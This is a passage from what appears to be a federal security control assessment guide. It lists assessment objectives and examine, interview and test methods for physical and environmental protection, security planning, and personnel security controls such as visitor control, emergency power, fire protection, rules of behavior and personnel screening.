Test: [SELECT FROM: Automated mechanisms implementing physical access monitoring capability]. (H)


ASSESSMENT PROCEDURE
PE-7 VISITOR CONTROL
Control: The organization controls physical access to the information system by authenticating visitors before authorizing access to the facility where the information system resides other than areas designated as publicly accessible.
Supplemental Guidance: Government contractors and others with permanent authorization credentials are not considered visitors. Personal Identity Verification (PIV) credentials for federal employees and contractors conform to FIPS 201, and the issuing organizations for the PIV credentials are accredited in accordance with the provisions of NIST Special Publication 800-79.
PE-7.1 ASSESSMENT OBJECTIVE:
Determine if the organization controls physical access to the information system by authenticating visitors before authorizing access to the facility where the information system resides other than areas designated as publicly accessible.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing visitor access control; visitor access control logs or records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with visitor access control responsibilities]. (M) (H)
Test: [SELECT FROM: Visitor access control capability]. (M) (H)
PE-7(1) VISITOR CONTROL
Control Enhancement:
The organization escorts visitors and monitors visitor activity, when required.
PE-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization escorts visitors and monitors visitor activity, when required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing visitor access control; visitor access control logs or records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with visitor access control responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
PE-8 ACCESS RECORDS
Control: The organization maintains visitor access records to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) that include: (i) name and organization of the person visiting; (ii) signature of the visitor; (iii) form of identification; (iv) date of access; (v) time of entry and departure; (vi) purpose of visit; and (vii) name and organization of person visited. Designated officials within the organization review the visitor access records [Assignment: organization-defined frequency].
Supplemental Guidance: None.
PE-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of review for visitor access records;
(ii) the organization maintains visitor access records to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) that include:
  • name and organization of the person visiting;
  • signature of the visitor;
  • form of identification;
  • date of access;
  • time of entry and departure;
  • purpose of visit;
  • name and organization of person visited; and
(iii) designated officials within the organization review the visitor access logs in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; security plan; facility access control records; other relevant documents or records]. (L) (M) (H)
PE-8(1) ACCESS RECORDS
Control Enhancement:
The organization employs automated mechanisms to facilitate the maintenance and review of access records.
PE-8(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to facilitate the maintenance and review of access records.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; automated mechanisms supporting management of access records; facility access control logs or records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for reviewing physical access records]. (H)
PE-8(2) ACCESS RECORDS
Control Enhancement:
The organization maintains a record of all physical access, both visitor and authorized individuals.
PE-8(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization maintains a record of all physical access, both visitor and authorized individuals.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; facility access control logs or records; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
PE-9 POWER EQUIPMENT AND POWER CABLING
Control: The organization protects power equipment and power cabling for the information system from damage and destruction.
Supplemental Guidance: None.
PE-9.1 ASSESSMENT OBJECTIVE:
Determine if the organization protects power equipment and power cabling for the information system from damage and destruction.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power equipment and cabling protection; facility housing power equipment and cabling; other relevant documents or records]. (M) (H)
PE-9(1) POWER EQUIPMENT AND POWER CABLING
Control Enhancement:
The organization employs redundant and parallel power cabling paths.
PE-9(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs redundant and parallel power cabling paths.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power equipment and cabling protection; facility housing power equipment and cabling; other relevant documents or records].


ASSESSMENT PROCEDURE
PE-10 EMERGENCY SHUTOFF
Control: The organization provides, for specific locations within a facility containing concentrations of information system resources, the capability of shutting off power to any information system component that may be malfunctioning or threatened without endangering personnel by requiring them to approach the equipment.
Supplemental Guidance: Facilities containing concentrations of information system resources may include, for example, data centers, server rooms, and mainframe rooms.
PE-10.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies the specific locations within a facility containing concentrations of information system resources (e.g., data centers, server rooms, mainframe rooms); and
(ii) the organization provides, for specific locations within a facility containing concentrations of information system resources, the capability of shutting off power to any information system component that may be malfunctioning or threatened without endangering personnel by requiring them to approach the equipment.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power source emergency shutoff; emergency shutoff controls or switches; other relevant documents or records]. (M) (H)
PE-10(1) EMERGENCY SHUTOFF
Control Enhancement:
The organization protects the emergency power-off capability from accidental or unauthorized activation.
PE-10(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization protects the emergency power-off capability from accidental or unauthorized activation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power source emergency shutoff; emergency shutoff controls or switches; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
PE-11 EMERGENCY POWER
Control: The organization provides a short-term uninterruptible power supply to facilitate an orderly shutdown of the information system in the event of a primary power source loss.
Supplemental Guidance: None.
PE-11.1 ASSESSMENT OBJECTIVE:
Determine if the organization provides a short-term uninterruptible power supply to facilitate an orderly shutdown of the information system in the event of a primary power source loss.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; uninterruptible power supply documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Uninterruptible power supply]. (H)
PE-11(1) EMERGENCY POWER
Control Enhancement:
The organization provides a long-term alternate power supply for the information system that is capable of maintaining minimally required operational capability in the event of an extended loss of the primary power source.
PE-11(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization provides a long-term alternate power supply for the information system that is capable of maintaining minimally required operational capability in the event of an extended loss of the primary power source.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; alternate power supply documentation; alternate power test records; other relevant documents or records]. (H)
Test: [SELECT FROM: Alternate power supply]. (H)
PE-11(2) EMERGENCY POWER
Control Enhancement:
The organization provides a long-term alternate power supply for the information system that is self-contained and not reliant on external power generation.
PE-11(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization provides a long-term alternate power supply for the information system that is self-contained and not reliant on external power generation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; alternate power supply documentation; alternate power test records; other relevant documents or records].
Test: [SELECT FROM: Alternate power supply].


ASSESSMENT PROCEDURE
PE-12 EMERGENCY LIGHTING
Control: The organization employs and maintains automatic emergency lighting that activates in the event of a power outage or disruption and that covers emergency exits and evacuation routes.
Supplemental Guidance: None.
PE-12.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs automatic emergency lighting that activates in the event of a power outage or disruption;
(ii) the organization employs automatic emergency lighting that covers emergency exits and evacuation routes; and
(iii) the organization maintains the automatic emergency lighting.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency lighting; emergency lighting documentation; emergency lighting test records; emergency exits and evacuation routes; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with emergency planning responsibilities]. (M) (H)
Test: [SELECT FROM: Emergency lighting capability]. (M) (H)


ASSESSMENT PROCEDURE
PE-13 FIRE PROTECTION
Control: The organization employs and maintains fire suppression and detection devices/systems that can be activated in the event of a fire.
Supplemental Guidance: Fire suppression and detection devices/systems include, but are not limited to, sprinkler systems, handheld fire extinguishers, fixed fire hoses, and smoke detectors.
PE-13.1 ASSESSMENT OBJECTIVE:
Determine if the organization employs and maintains fire suppression and detection devices/systems that can be activated in the event of a fire.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; fire suppression and detection devices/systems; fire suppression and detection devices/systems documentation; test records of fire suppression and detection devices/systems; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H)
PE-13(1) FIRE PROTECTION
Control Enhancement:
The organization employs fire detection devices/systems that activate automatically and notify the organization and emergency responders in the event of a fire.
PE-13(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs fire detection devices/systems that, without manual intervention, notify the organization and emergency responders in the event of a fire.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; facility housing the information system; alarm service level agreements; test records of fire suppression and detection devices/systems; fire suppression and detection devices/systems documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H)
Test: [SELECT FROM: Simulated fire detection and automated notifications]. (H)
PE-13(2) FIRE PROTECTION
Control Enhancement:
The organization employs fire suppression devices/systems that provide automatic notification of any activation to the organization and emergency responders.
PE-13(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs fire suppression devices/systems that provide automatic notification of any activation to the organization and emergency responders.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; fire suppression and detection devices/systems documentation; facility housing the information system; alarm service level agreements; test records of fire suppression and detection devices/systems; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H)
Test: [SELECT FROM: Simulated activation of fire suppression devices/systems and automated notifications]. (H)
PE-13(3) FIRE PROTECTION
Control Enhancement:
The organization employs an automatic fire suppression capability in facilities that are not staffed on a continuous basis.
PE-13(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs an automatic fire suppression capability in facilities that are not staffed on a continuous basis.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; facility housing the information system; alarm service level agreements; facility staffing plans; test records of fire suppression and detection devices/systems; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H)
Test: [SELECT FROM: Simulated activation of fire suppression devices/systems and automated notifications]. (H)


ASSESSMENT PROCEDURE
PE-14 TEMPERATURE AND HUMIDITY CONTROLS
Control: The organization regularly maintains, within acceptable levels, and monitors the temperature and humidity within the facility where the information system resides.
Supplemental Guidance: None.
PE-14.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization regularly maintains, within acceptable levels, the temperature and humidity within the facility where the information system resides; and
(ii) the organization regularly monitors the temperature and humidity within the facility where the information system resides.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing temperature and humidity control; facility housing the information system; temperature and humidity controls; temperature and humidity controls documentation; temperature and humidity records; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PE-15 WATER DAMAGE PROTECTION
Control: The organization protects the information system from water damage resulting from broken plumbing lines or other sources of water leakage by providing master shutoff valves that are accessible, working properly, and known to key personnel.
Supplemental Guidance: None.
PE-15.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization protects the information system from water damage resulting from broken plumbing lines or other sources of water leakage by providing master shutoff valves that are accessible and working properly; and
(ii) key personnel within the organization have knowledge of the master water shutoff valves.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing water damage protection; facility housing the information system; master shutoff valves; list of key personnel with knowledge of location and activation procedures for master shutoff valves for the plumbing system; master shutoff valve documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organization personnel with physical and environmental protection responsibilities]. (M) (H)
Test: [SELECT FROM: Master water-shutoff valves, process for activating master water-shutoff]. (M) (H)
PE-15(1) WATER DAMAGE PROTECTION
Control Enhancement:
The organization employs mechanisms that, without the need for manual intervention, protect the information system from water damage in the event of a significant water leak.
PE-15(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs mechanisms that, without the need for manual intervention, protect the information system from water damage in the event of a significant water leak.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing water damage protection; facility housing the information system; automated mechanisms for water shutoff valves; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing master water shutoff valve activation]. (H)


ASSESSMENT PROCEDURE
PE-16 DELIVERY AND REMOVAL
Control: The organization authorizes and controls information system-related items entering and exiting the facility and maintains appropriate records of those items.
Supplemental Guidance: The organization controls delivery areas and, if possible, isolates the areas from the information system and media libraries to avoid unauthorized physical access.
PE-16.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization authorizes and controls information system-related items (i.e., hardware, firmware, software) entering and exiting the facility; and
(ii) the organization maintains appropriate records of items entering and exiting the facility.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing delivery and removal of information system components from the facility; facility housing the information system; records of items entering and exiting the facility; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organization personnel with tracking responsibilities for information system components entering and exiting the facility]. (M) (H)
Test: [SELECT FROM: Process for controlling information system-related items entering and exiting the facility]. (M) (H)


ASSESSMENT PROCEDURE
PE-17 ALTERNATE WORK SITE
Control: The organization employs appropriate management, operational, and technical information system security controls at alternate work sites.
Supplemental Guidance: The organization provides a means for employees to communicate with information system security staff in case of security problems. NIST Special Publication 800-46 provides guidance on security in telecommuting and broadband communications.
PE-17.1 ASSESSMENT OBJECTIVE:
Determine if the organization employs appropriate management, operational, and technical information system security controls at alternate work sites.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing alternate work sites for organizational personnel; list of management, operational, and technical security controls required for alternate work sites; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organization personnel using alternate work sites]. (M) (H)


ASSESSMENT PROCEDURE
PE-18 LOCATION OF INFORMATION SYSTEM COMPONENTS
Control: The organization positions information system components within the facility to minimize potential damage from physical and environmental hazards and to minimize the opportunity for unauthorized access.
Supplemental Guidance: Physical and environmental hazards include, for example, flooding, fire, tornados, earthquakes, hurricanes, acts of terrorism, vandalism, electrical interference, and electromagnetic radiation. Whenever possible, the organization also considers the location or site of the facility with regard to physical and environmental hazards.
PE-18.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization positions information system components within the facility to minimize potential damage from physical and environmental hazards; and
(ii) the organization positions information system components within the facility to minimize the opportunity for unauthorized access.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing positioning of information system components; documentation providing the location and position of information system components within the facility; other relevant documents or records]. (M) (H)
PE-18(1) LOCATION OF INFORMATION SYSTEM COMPONENTS
Control Enhancement:
The organization plans the location or site of the facility where the information system resides with regard to physical and environmental hazards and for existing facilities, considers the physical and environmental hazards in its risk mitigation strategy.
PE-18(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization plans the location or site of the facility where the information system resides with regard to physical and environmental hazards; and
(ii) the organization, for existing facilities, considers the physical and environmental hazards in its risk mitigation strategy.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; physical site planning documents; organizational assessment of risk; contingency plan; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organization personnel with site selection responsibilities for the facility housing the information system]. (H)


ASSESSMENT PROCEDURE
PE-19 INFORMATION LEAKAGE
Control: The organization protects the information system from information leakage due to electromagnetic signals emanations.
Supplemental Guidance: The FIPS 199 security categorization (for confidentiality) of the information system and organizational security policy guides the application of safeguards and countermeasures employed to protect the information system against information leakage due to electromagnetic signals emanations.
PE-19.1 ASSESSMENT OBJECTIVE:
Determine if the organization protects the information system from information leakage due to electromagnetic signals emanations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing information leakage due to electromagnetic signals emanations; mechanisms protecting the information system against electronic signals emanation; facility housing the information system; records from electromagnetic signals emanation tests; other relevant documents or records].
Test: [SELECT FROM: Information system for information leakage due to electromagnetic signals emanations].


FAMILY:

Planning


ASSESSMENT PROCEDURE
PL-1 SECURITY PLANNING POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, security planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security planning policy and associated security planning controls.
Supplemental Guidance: The security planning policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security planning policy addresses the overall policy requirements for confidentiality, integrity, and availability and can be included as part of the general information security policy for the organization. Security planning procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-18 provides guidance on security planning. NIST Special Publication 800-12 provides guidance on security policies and procedures.
PL-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents security planning policy and procedures;
(ii) the organization disseminates security planning policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review security planning policy and procedures; and
(iv) the organization updates security planning policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security planning responsibilities]. (H)
PL-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the security planning policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the security planning policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the security planning procedures address all areas identified in the security planning policy and address achieving policy-compliant implementations of all associated security planning controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security planning responsibilities]. (H)


ASSESSMENT PROCEDURE
PL-2 SYSTEM SECURITY PLAN
Control: The organization develops and implements a security plan for the information system that provides an overview of the security requirements for the system and a description of the security controls in place or planned for meeting those requirements. Designated officials within the organization review and approve the plan.
Supplemental Guidance: The security plan is aligned with the organization's information system architecture and information security architecture. NIST Special Publication 800-18 provides guidance on security planning.
PL-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and implements a security plan for the information system;
(ii) the security plan provides an overview of the security requirements for the information system and a description of the security controls planned or in place for meeting the security requirements;
(iii) the organization defines in the security plan, explicitly or by reference, the values for all organization-defined parameters (i.e., assignment and selection operations) in applicable security controls and control enhancements;
(iv) the security plan development is consistent with NIST Special Publication 800-18;
(v) the security plan is consistent with the organization's information system architecture and information security architecture; and
(vi) designated organizational officials review and approve the security plan.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy; procedures addressing security plan development and implementation; NIST Special Publication 800-18; security plan for the information system; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PL-3 SYSTEM SECURITY PLAN UPDATE
Control: The organization reviews the security plan for the information system [Assignment: organization-defined frequency, at least annually] and revises the plan to address system/organizational changes or problems identified during plan implementation or security control assessments.
Supplemental Guidance: Significant changes are defined in advance by the organization and identified in the configuration management process. NIST Special Publication 800-18 provides guidance on security plan updates.
PL-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of security plan reviews/updates and the frequency is at least annually;
(ii) the organization updates the security plan in accordance with organization-defined frequency;
(iii) the organization defines in the update to the security plan, explicitly or by reference, the values for all organization-defined parameters (i.e., assignment and selection operations) in applicable updated security controls and control enhancements;
(iv) the organization receives input to update the security plan from the organization's configuration management and control process; and
(v) the updated security plan reflects the information system and organizational changes or problems identified during the implementation of the plan or the assessment of the security controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy; procedures addressing security plan updates; security plan; configuration management policy and procedures; configuration management documents; security plan for the information system; record of security plan reviews and updates; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PL-4 RULES OF BEHAVIOR
Control: The organization establishes and makes readily available to all information system users, a set of rules that describes their responsibilities and expected behavior with regard to information and information system usage. The organization receives signed acknowledgement from users indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to the information system and its resident information.
Supplemental Guidance: Electronic signatures are acceptable for use in acknowledging rules of behavior unless specifically prohibited by organizational policy. NIST Special Publication 800-18 provides guidance on preparing rules of behavior.
PL-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes a set of rules that describe user responsibilities and expected behavior with regard to information and information system usage;
(ii) the organization makes the rules available to all information system users;
(iii) the rules of behavior for organizational personnel are consistent with NIST Special Publication 800-18; and
(iv) the organization receives a signed acknowledgement from users indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to the information system and its resident information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy; procedures addressing rules of behavior for information system users; NIST Special Publication 800-18; rules of behavior; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel who are authorized users of the information system and have signed rules of behavior]. (M) (H)


ASSESSMENT PROCEDURE
PL-5 PRIVACY IMPACT ASSESSMENT
Control: The organization conducts a privacy impact assessment on the information system in accordance with OMB policy.
Supplemental Guidance: OMB Memorandum 03-22 provides guidance for implementing the privacy provisions of the E-Government Act of 2002.
PL-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization conducts a privacy impact assessment on the information system; and
(ii) the privacy impact assessment is compliant with OMB policy.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy; procedures addressing privacy impact assessments on the information system; appropriate federal legislation and OMB policy; privacy impact assessment; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PL-6 SECURITY-RELATED ACTIVITY PLANNING
Control: The organization plans and coordinates security-related activities affecting the information system before conducting such activities in order to reduce the impact on organizational operations (i.e., mission, functions, image, and reputation), organizational assets, and individuals.
Supplemental Guidance: Routine security-related activities include, but are not limited to, security assessments, audits, system hardware and software maintenance, security certifications, and testing/exercises. Organizational advance planning and coordination includes both emergency and non-emergency (i.e., routine) situations.
PL-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization plans and coordinates security-related activities affecting the information system before conducting such activities in order to reduce the impact on organizational operations, organizational assets, and individuals; and
(ii) the organization's advance planning and coordination of security-related activities includes both emergency and non-emergency situations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security planning policy; procedures addressing security-related activity planning for the information system; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with security planning and plan implementation responsibilities]. (M) (H)


FAMILY: Personnel Security


ASSESSMENT PROCEDURE
PS-1 PERSONNEL SECURITY POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, personnel security policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the personnel security policy and associated personnel security controls.
Supplemental Guidance: The personnel security policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The personnel security policy can be included as part of the general information security policy for the organization. Personnel security procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
PS-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents personnel security policy and procedures;
(ii) the organization disseminates personnel security policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review personnel security policy and procedures; and
(iv) the organization updates personnel security policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (H)
PS-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the personnel security policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the personnel security policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the personnel security procedures address all areas identified in the personnel security policy and address achieving policy-compliant implementations of all associated personnel security controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (H)


ASSESSMENT PROCEDURE
PS-2 POSITION CATEGORIZATION
Control: The organization assigns a risk designation to all positions and establishes screening criteria for individuals filling those positions. The organization reviews and revises position risk designations [Assignment: organization-defined frequency].
Supplemental Guidance: Position risk designations are consistent with 5 CFR 731.106(a) and Office of Personnel Management policy and guidance.
PS-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization assigns risk designations to all positions within the organization;
(ii) the organization establishes screening criteria for individuals filling organizational positions;
(iii) the risk designations for the organizational positions are consistent with 5 CFR 731.106(a) and OPM policy and guidance;
(iv) the organization defines in the security plan, explicitly or by reference, the frequency of risk designation reviews and updates for organizational positions; and
(v) the organization reviews and revises position risk designations in accordance with the organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing position categorization; appropriate codes of federal regulations; OPM policy and guidance; list of risk designations for organizational positions; security plan; records of risk designation reviews and updates; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PS-3 PERSONNEL SCREENING
Control: The organization screens individuals requiring access to organizational information and information systems before authorizing access.
Supplemental Guidance: Screening is consistent with: (i) 5 CFR 731.106; (ii) Office of Personnel Management policy, regulations, and guidance; (iii) organizational policy, regulations, and guidance; (iv) FIPS 201 and Special Publications 800-73, 800-76, and 800-78; and (v) the criteria established for the risk designation of the assigned position.
PS-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization screens individuals requiring access to organizational information and information systems prior to authorizing access; and
(ii) the personnel screening is consistent with 5 CFR 731.106, OPM policy, regulations, and guidance, FIPS 201 and NIST Special Publications 800-73, 800-76, and 800-78, and the criteria established for the risk designation for the assigned position.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel screening; records of screened personnel; FIPS 201; NIST Special Publications 800-73, 800-76, and 800-78; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PS-4 PERSONNEL TERMINATION
Control: The organization, upon termination of individual employment, terminates information system access, conducts exit interviews, retrieves all organizational information system-related property, and provides appropriate personnel with access to official records created by the terminated employee that are stored on organizational information systems.
Supplemental Guidance: Information system-related property includes, for example, keys, identification cards, and building passes. Timely execution of this control is particularly essential for employees or contractors terminated for cause.
PS-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization terminates information system access upon termination of individual employment;
(ii) the organization conducts exit interviews of terminated personnel;
(iii) the organization retrieves all organizational information system-related property from terminated personnel; and
(iv) the organization retains access to official documents and records on organizational information systems created by terminated personnel.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel termination; records of personnel termination actions; list of information system accounts; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
PS-5 PERSONNEL TRANSFER
Control: The organization reviews information systems/facilities access authorizations when personnel are reassigned or transferred to other positions within the organization and initiates appropriate actions.
Supplemental Guidance: Appropriate actions that may be required include: (i) returning old and issuing new keys, identification cards, building passes; (ii) closing old accounts and establishing new accounts; (iii) changing system access authorizations; and (iv) providing for access to official records created or controlled by the employee at the old work location and in the old accounts.
PS-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization reviews information systems/facilities access authorizations when personnel are reassigned or transferred to other positions within the organization; and
(ii) the organization initiates appropriate actions (e.g., reissuing keys, identification cards, building passes; closing old accounts and establishing new accounts; and changing system access authorization) for personnel reassigned or transferred within the organization.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel transfer; records of personnel transfer actions; list of information system and facility access authorizations; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PS-6 ACCESS AGREEMENTS
Control: The organization completes appropriate signed access agreements for individuals requiring access to organizational information and information systems before authorizing access and reviews/updates the agreements [Assignment: organization-defined frequency].
Supplemental Guidance: Access agreements include, for example, nondisclosure agreements, acceptable use agreements, rules of behavior, and conflict-of-interest agreements. Electronic signatures are acceptable for use in acknowledging access agreements unless specifically prohibited by organizational policy.
PS-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization requires appropriate access agreements for individuals requiring access to organizational information and information systems before authorizing access;
(ii) organizational personnel sign appropriate access agreements prior to receiving access;
(iii) the organization defines in the security plan, explicitly or by reference, the frequency of reviews/updates for access agreements; and
